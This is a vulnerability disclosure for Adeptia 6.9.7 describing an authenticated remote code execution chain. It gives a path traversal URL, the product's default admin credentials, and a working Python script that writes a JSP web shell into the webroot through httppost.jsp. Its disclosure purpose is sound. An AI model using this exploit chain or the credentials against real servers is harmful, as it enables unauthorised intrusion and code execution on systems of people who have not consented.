Post-auth RCE in Adeptia 6.9

Abstract

Adeptia is a low-code integration platform. Companies can use it to automate business information flows. An authenticated attacker can execute arbitrary code via two vulnerabilities in the webservice.

Tested versions

This issue was tested on Adeptia version 6.9.7 (Enterprise Edition, Build Tag Release_6_7_12June_2017). It is likely that other versions are also affected.

Introduction

Adeptia is a low-code integration platform. Authenticated users can create various automation flows with pre-programmed components. These components vary from basic input/output interfaces to running custom plugins and making web requests. However, components are sandboxed and shouldn't allow access outside the flow context. There is also a Native Calls component to run sh scripts, but it requires a shell script to already exist on the system.

The application contains a path traversal vulnerability that attackers can use to download arbitrary files. Information from the Adeptia configuration can then be used to exploit a arbitrary file upload vulnerability to upload jsp files and execute arbitrary code.

An attacker needs to be logged in to exploit these vulnerabilities. The default credentials are admin:indigo1.

Details

The administrative section of Adeptia contains a path traversal vulnerability via WebDAVView.jsp. The vulnerability can be exploited to download arbitrary files. An example is:

http://server/adeptia/WebDAVView.jsp?filePath=../../bin/license.txt

The path traversal issue can be used to download the Adeptia configuration files, like server-configure.properties. The configuration files contain the path to the webroot, which is required to upload arbitrary files.

Path traversal can be used to download the server's jar files. Reversing the jars shows an httppost$jsp.class with an upload function. The upload function allows users to write to arbitrary locations on the disk. The screenshot below shows that a call to httppost.jsp fills a 4096-byte buffer with the web request, which it will then write to a location determined by the variable FileName.

The following Python script uploads the file pnt_hi.jsp to the server's webroot. Note that it fills the 4096 byte buffer with spaces. Without the spaces the buffer will get padded with null bytes, which will break the jsp.

import requests
headers = {
'Cookie':'maintab=tcontent1; JSESSIONID=[session_id]',
'User-Agent':'Mozilla/5.0 [user agent]'
}
url = "http://[host]:8080/adeptia/control/httppost.jsp?FileName=D:\\AdeptiaSuite\\AdeptiaSuite-6.9\\AdeptiaServer\\ServerKernel\\web\
\pnt_hi.jsp"
data = open('pnt_hi.jsp','r').read()
missing = 4096 - len(data)
data += ' ' * missing
res = requests.get(url, data=data, headers=headers, verify=False)
print(res.text)

Then just visit visit [server]:8080/adeptia/pnt_hi.jsp to get your shell.

Timeline

~August 2024 - Tried to report via contact form and LinkedIn, no response
~September 2024 - Tried to report it some more, no response
14 September 2025 - Published